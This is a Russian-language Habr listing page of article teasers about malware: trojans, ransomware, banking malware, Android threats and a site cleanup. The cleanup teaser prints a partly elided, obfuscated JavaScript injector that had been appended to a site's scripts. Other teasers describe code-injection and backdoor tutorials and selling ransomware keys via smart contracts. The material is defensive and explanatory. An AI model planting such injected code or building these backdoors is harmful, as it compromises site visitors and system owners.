Как стать автором
Обновить

Обнаружен уникальный троянец на Node.js

Антивирусная защита *JavaScript *Node.JS *
В лаборатории «Доктор Веб» исследован троянец-загрузчик, написанный на JavaScript и использующий для запуска Node.js. Вредоносное ПО распространяется через сайты с читами для популярных видеоигр и получило название Trojan.MonsterInstall.
Читать дальше →
Всего голосов 32: ↑23 и ↓9 +14
Просмотры 15K
Комментарии 13

Российские хакеры модифицировали Chrome и Firefox. Они отслеживают шифрованный трафик пользователей

Firefox Информационная безопасность *Антивирусная защита *Google Chrome Браузеры
image

Kaspersky опубликовала отчет о попытках российской группы Turla отследить шифрованный сетевой трафик путем модификации Chrome и Firefox. Как правило, хакеры не вскрывают браузеры за пределами эксплуатации их уязвимостей.

Данный процесс требует заразить компьютер вирусом-трояном Reductor с удаленным доступом, схожим с COMPfun. Тот модифицирует браузеры для перехвата трафика от хоста, начиная с установки собственных сертификатов. Они патчат псевдо-случайный генератор чисел, используемый для безопасных подключений. Это позволяет злоумышленникам добавлять «отпечаток» к каждому TLS-действию и пассивно отслеживать шифрованный трафик.

Издание ZDNet предположило, что хакеры могли пойти на этот ход на случай обнаружения трояна, когда пользователи не переустанавливают зараженный браузер.
Читать дальше →
Всего голосов 18: ↑15 и ↓3 +12
Просмотры 14K
Комментарии 2

Зловреды начали выдавать себя за «блокировщики» рекламы на Android-устройствах

Спам и антиспам Информационная безопасность *Антивирусная защита *Разработка под Android *
image

Эксперты в области кибербезопасности установили, что некоторые приложения, которые выдают себя за блокировщики рекламы на Android, на самом деле являются вредоносными программами. Если установить такое приложение, то оно начинает «спамить» рекламными объявлениями.

Зловред получил название FakeAdsBlock, так как в названиях многих таких программ встречается сочетание Ads Blocker.

Приложения распространяются через сторонние магазины приложений. Их, как правило, скачивают те, кто хочет смотреть видео без рекламы. Фейк при установке запрашивает разрешение на показ контента поверх остальных окон, либо на отображение виджета и установку VPN-соединения.
Читать дальше →
Всего голосов 29: ↑14 и ↓15 -1
Просмотры 6.9K
Комментарии 15

Клиент Discord модифицировали для кражи аккаунтов

Информационная безопасность *Разработка под Windows *
imageФото: www.bleepingcomputer.com

В клиенте Discord начало распространяться новое вредоносное ПО NitroHack. Оно позволяет красть учетные записи. Распространение этого ПО стало возможным благодаря изменениям файлов JavaScript, используемых клиентом.
Читать дальше →
Всего голосов 15: ↑15 и ↓0 +15
Просмотры 16K
Комментарии 14

Обнаружен новый троян-вымогатель, выдающий себя за антивирус «Лаборатории Касперского»

Информационная безопасность *
VirusInfo предупреждает об активном распространении новой разновидности вредоносного программного обеспечения, относящегося к типу троянских вымогателей — Trojan-Ransom.Win32.SMSer
В настоящее время в русском секторе Интернета циркулируют 6 разновидностей данного трояна.

Вредоносное ПО блокирует нормальную работу ПК и предлагает пользователю отправить платное SMS-сообщение для восстановления функционала, что является типичным поведением троянских вымогателей. Особенность данного образца состоит в том, что он пытается выдать себя за несуществующий «онлайн-антивирус Лаборатории Касперского», обнаруживший на компьютере пользователя некий «вирус» и предлагающий «удалить» его. При этом, как можно видеть из снимка экрана выше, текст малограмотен и содержит как орфографические, так и пунктуационные ошибки.

Подробное описание трояна и метод лечения зараженного ПК в подробной статье на Virusinfo.info — Trojan-Ransom.Win32.SMSer: вымогатель, выдающий себя за антивирус «Лаборатории Касперского»

image
Всего голосов 23: ↑10 и ↓13 -3
Просмотры 1.1K
Комментарии 23

Используйте Linux для работы с online-банками

Чулан
image
Именно так советует всем поступать Брайан Крибс (Bryan Krebs), колумнист The Washington Post, в статье Avoid Windows Malware: Bank on a Live CD. Он взял интервью у представителей нескольких десятков компаний, потерявших от $10,000 до $500,000 из-за вредоносного ПО оказавшегося на компьютерах, с которых проводились банковские операции. В качестве примера, в другой статье автора, указывается тройан Zeus, позволяющий злоумышленникам подменить оригинальную страницу банка, своей и перехватить данные пользователя. Брайан даже написал руководство по использованию Ubuntu Live CD для тех, кто ни когда не имел с ним дела. Конечно, Mac тоже подойдет, но статья написана для Windows-пользователей не желающих насовсем менять основную ОС.
Читать дальше →
Всего голосов 29: ↑16 и ↓13 +3
Просмотры 1.2K
Комментарии 17

Удаляем троян winlock

Чулан
Знаю, что на хабре такие посты не очень любят, тем не менее я считаю, что некоторым этот способ может пригодиться или просто сэкономить время. Троян, который мне попался свежий и определяется всего несколькими антивирусами. Результаты проверки вирустотала. Кода разблокировки я тоже найти не смог. Поэтому, что бы не утомлять описанием как я его искал сделаю пост в виде краткого гайда.
Читать дальше →
Всего голосов 35: ↑17 и ↓18 -1
Просмотры 3.6K
Комментарии 45

Очередной массовый взлом ICQ-UIN'ов

Информационная безопасность *
Сразу от нескольких человек из контакт-листа в течение небольшого интервала пришло предложение скачать файл Snatch.exe под видом очередной мини-игры.

Snatch - Trojan.Win32.Snatch

Скачать вирус можно и ничего страшного не предвидится, пока вы его собственноручно не запустите.

На форумах, например на E1, говорят, что после перезагрузки в асю уже нельзя войти и от вашего UIN'а начинается рассылка этого же файла. Лечится удалением из процессов Snatch.exe и очисткой всех связанных с ним записей в реестре. А вот пароль от ICQ придётся восстанавливать.

Spycheck говорит, что это Trojan.Win32.Snatch.

Что интересно, из разговоров с ботами видно, что создатели вируса не поленились научить их общаться.

UPD. Скачать файл с вирусом для изучения и, собственно говоря, прохождения игры можно здесь. Внимание! Будьте осторожны! Там вирус...
Всего голосов 194: ↑129 и ↓65 +64
Просмотры 2.3K
Комментарии 254

Анализ очередного варианта скрытого радмина

Антивирусная защита *
Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же. Немного опережу события и скажу, что это бэкдор созданный из радмина второй ветки и кое-что еще)
Полученный файл: kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию — это какая-то книга, почему в exe — непонятно, глядим далее.
Воспользуемся PEiD:

UPX 0.89.6 — 1.02 / 1.05 — 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
Попробуем распаковать винраром, получим два файла:
Читать дальше →
Всего голосов 89: ↑78 и ↓11 +67
Просмотры 30K
Комментарии 76

DroidKungFu-разбор полетов malware на Android

Информационная безопасность *
Из песочницы
Новостная сводка:

Весной сего года из AndroidMarket было удалено 21 приложение, под которыми скрывалась вредоносная программа DroidDreamLight. После установки, уличенные приложения отправляли довольно приличный объем пользовательской информации, хранящейся на гуглофонах.
И вот, в июне этого года, сотрудники Университета штата Северная Каролина сообщили, что была обнаружена новая версия вредоносной программы DroidKungFu.

Читать дальше →
Всего голосов 15: ↑10 и ↓5 +5
Просмотры 1.8K
Комментарии 0

Политический спам о митинге на Пушкинской площади «убивает» компьютеры пользователей

Блог компании Доктор Веб
Срочная новость! Друзья, берегите компы.

Несмотря на то что перед общероссийскими президентскими выборами в почтовом трафике практически не встречалось спам-рассылок на политические темы, злоумышленникам удалось активизироваться после окончания голосования.

5 марта 2012 года специалистами «Доктор Веб» была зафиксирована массовая почтовая рассылка, содержащая призывы принять участие в протестном митинге оппозиции на Пушкинской площади в Москве.

Почтовые сообщения, имеющие тему «Митинг Честные выборы» или «Все на митинг», содержат короткий текст, например: «Внимательно изучи инструкцию что необходимо будет делать на этом митинге», «Митинг против Путина.
Читать дальше →
Всего голосов 28: ↑15 и ↓13 +2
Просмотры 2.4K
Комментарии 21

Уязвимости платформы Android. Настоящее и будущее

Блог компании Доктор Веб Информационная безопасность *
Уважаемые и многолюбимые хабравчане, предлагаем вам ознакомиться с крайне интересным материалом нашего аналитика Александра Горячева, написанным специально для Habrahabr. Статья посвящена обзору существующих уязвимостей крайне популярной мобильной платформы Android, а также тому, как можно было бы сделать ее более безопасной. Комментарии и собственные соображения по теме приветствуются.

ОС Android за небольшой промежуток времени стала одной из самых популярных систем для всевозможных мобильных устройств. Ее используют как крупные производители с мировым именем, так и небольшие компании, поэтому ценовой разброс готовой продукции, такой как смартфоны и планшетные компьютеры, позволяет удовлетворить потребности потребителей практически на сто процентов. Именно широкий ассортимент, гибкое ценообразование и поддержка платформы со стороны внушительного числа производителей стали одними из главных факторов успеха и позволили системе занять нынешнее положение на рынке.
Читать дальше →
Всего голосов 69: ↑44 и ↓25 +19
Просмотры 73K
Комментарии 78

Технологии обнаружения мобильных угроз. Немного об Origins Tracing™

Блог компании Доктор Веб Информационная безопасность *
Уважаемые хабравчане, мы уже не раз вам рассказывали об угрозах для Android и, вероятно, уже плешь проели некоторым скептикам. Сегодня мы предложим вам поговорить, скорее, не о вредоносном ПО для этой мобильной платформы, а о технологиях, применяемых для его обнаружения. И начнем свой рассказ, пожалуй, с технологии Origins Tracing, реализованной в Dr.Web для Android.

На все ваши вопросы по этой теме сегодня отвечают не какие-то там маркетологи, а аналитик «Доктор Веб» по мобильным угрозам Александр Горячев.
Читать дальше →
Всего голосов 6: ↑2 и ↓4 -2
Просмотры 5.6K
Комментарии 4

Лечение сайта от вируса в файлах javascript и других на примере

Информационная безопасность *
Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду
Читать дальше →
Всего голосов 24: ↑8 и ↓16 -8
Просмотры 8.1K
Комментарии 34

Gray Hat Python — DLL и Code Injection

Python *
Из песочницы

Intro


Порой, когда вы реверсите или атакуете программу, полезно иметь возможность загрузить и выполнить свой код в контексте исследуемого процесса. Крадете ли вы хэши паролей или получаете доступ к удаленному рабочему столу целевой системы, методы внедрения кода и dll-библиотек предоставляют мощные возможности. Мы создадим несколько простых утилит на Питоне, которые позволят вам использовать оба метода. Эти методы должны входить в арсенал каждого разработчика программ, эксплойтов, шелл-кодов и пентестеров. Мы будем использовать внедрение DLL (DLL injection) для запуска всплывающего окна внутри другого процесса. Так же мы будем использовать внедрение кода (code injection), чтобы протестировать шелл-код, разработанный для уничтожения какого-либо процесса основываясь на его PID. Под конец главы мы создадим и скомпилируем Trojan’a (с функционалом backdoor’a) полностью написанного на Python. В большей степени он будет опираться на внедрении кода и использовании некоторых других скрытых тактик, которые должен использовать каждый хороший бэкдор. Давайте начнем с рассмотрения темы создания удаленных потоков, которые являются основой для обоих методов внедрения.
Читать дальше →
Всего голосов 28: ↑27 и ↓1 +26
Просмотры 29K
Комментарии 13

Страшная сказка на ночь для пользователей Android

Блог компании «Apps Ministry» Разработка под Android *
Каждый, наверное, сталкивался с сайтами, предлагающими пользователю платную подписку на ту или иную услугу. В силу специфики моей работы мне иногда приходится проверять подобные ресурсы. Чаще всего они наспех набиты контентом, фальшивыми комментариями и созданы специально для обмана пользователя. Создатели обещают золотые горы, а на деле все заканчивается банальным разводом на деньги. Данная статья — один из частных случаев анализа фейк-сайта с приложением для Android.
Читать дальше →
Всего голосов 134: ↑116 и ↓18 +98
Просмотры 111K
Комментарии 229

Банковский троян Hesperbot – детальный анализ

Блог компании ESET NOD32
Мы уже писали про Hesperbot, эта угроза представляет из себя новое банковское вредоносное ПО и имеет модульную архитектуру. Злоумышленники использовали его для проведения атак на пользователей различных стран, включая Турцию, Чехию, Португалию и Великобританию. Основной целью атак было похищение конфиденциальных данных онлайн-банкинга пользователей и установка мобильного компонента вредоносного кода на устройства под управлением Symbian, Android, Blackberry. Киберпреступники использовали убедительную схему фишинга для заманивания пользователей на вредоносные ссылки, что делало их подход еще более практичным.



Компрометация пользователя происходит при переходе по вредоносной ссылке. Ниже показана схема, используемая злоумышленниками.


Рис. Схема компрометации пользователя.

Читать дальше →
Всего голосов 40: ↑36 и ↓4 +32
Просмотры 22K
Комментарии 6

Произошла утечка «клиентской» части KINS

Блог компании ESET NOD32
Ранее мы упоминали о новом мощном банковском вредоносном ПО KINS. Речь идет о crimeware toolkit, который предоставляет злоумышленникам большие возможности по краже различных данных у пользователей. Теперь же стало известно, что часть текстов «клиентской» части KINS оказалась доступна всем желающим. В блоге Xylit0l указываются некоторые несоответствия оригинальной статьи Fox-IT о первых семплах KINS, которая была выпущена после публикации RSA.



Мы можем констатировать, что утечка текстов очередного вредоносного банковского ПО является плохой новостью для пользователей, поскольку спровоцирует новую волну распространения дропперов, основанных на этих текстах. Архив включает в себя:

Читать дальше →
Всего голосов 8: ↑8 и ↓0 +8
Просмотры 6.1K
Комментарии 1

Нестандартный топ событий в сфере IT-безопасности 2015

Блог компании «Лаборатория Касперского» Информационная безопасность *
Вот и пришло время повторить упражнение, которое я первый раз выполнил ровно год назад. Тогда я взял 10 самых популярных новостей с нашего сайта Threatpost и попытался выяснить — почему именно они, собственно, привлекли внимание общественности — и специалистов, и обычных пользователей. Такой метод имеет очевидные недостатки — на популярность статей много что влияет, и совершенно не обязательно, что самые популярные новости об инцидентах в кибермире являются одновременно и самыми важными. Но есть и достоинства: событий в сфере информационной безопасности происходит огромное количество, и каждый участник их обсуждения, в зависимости от специализации и личных интересов, выберет свои «самые-самые». А тут — если и не самый объективный, то хотя бы независимый инструмент оценки.

В этом году подборка самых посещаемых новостей удачно делится на пять основных категорий:
— Низкотехнологичные угрозы для пользователей
— «Уязвимости в неожиданных местах»: безопасность «интернета вещей», домашних и промышленных сетевых устройств,
— Проблемы шифрования данных
— Громкие уязвимости в ключевых платформах и «хайтек» киберугроз — примеры самых продвинутых атак
— Рутинные, но опасные уязвимости в распространенном софте

Вот по ним и пройдемся.
Читать дальше →
Всего голосов 11: ↑9 и ↓2 +7
Просмотры 12K
Комментарии 3

Malware + Blockchain = ❤️

Информационная безопасность *
Туториал

Эта статья является продолжением цикла о написании умных контрактов на платформе Ethereum. В первой части я пообещал показать, как создать новую криптовалюту на Solidity (в мире блокчейна это является чем-то вроде аналога "Hello, world!"). Но на самом деле в этом нет смысла, так как об этом уже написано несколько хороших статей (пример из доков Solidity, пример с главной страницы Ethereum).


Так что я немного подумал и нашел еще один use case для умных контрактов. В данной статье я покажу, как теоретически автор трояна-шифровальщика может монетизировать свое детище, продавая ключи для расшифровки с помощью умных контрактов.


BTW все написанное ниже имеет чисто образовательный характер.


Читать дальше →
Всего голосов 28: ↑25 и ↓3 +22
Просмотры 27K
Комментарии 5
1